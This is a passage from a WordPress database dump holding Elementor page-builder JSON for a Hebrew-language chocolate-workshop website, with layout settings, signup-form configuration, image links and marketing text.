\\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(402,93,'_elementor_version','2.9.8'),(403,7,'_yoast_wpseo_title','שוקולד4U - סדנאות שוקולד לכל אחד, בואו לטעום'),(405,99,'_wp_page_template','elementor_canvas'),(406,99,'_elementor_edit_mode','builder'),(407,99,'_elementor_template_type','post'),(408,99,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea 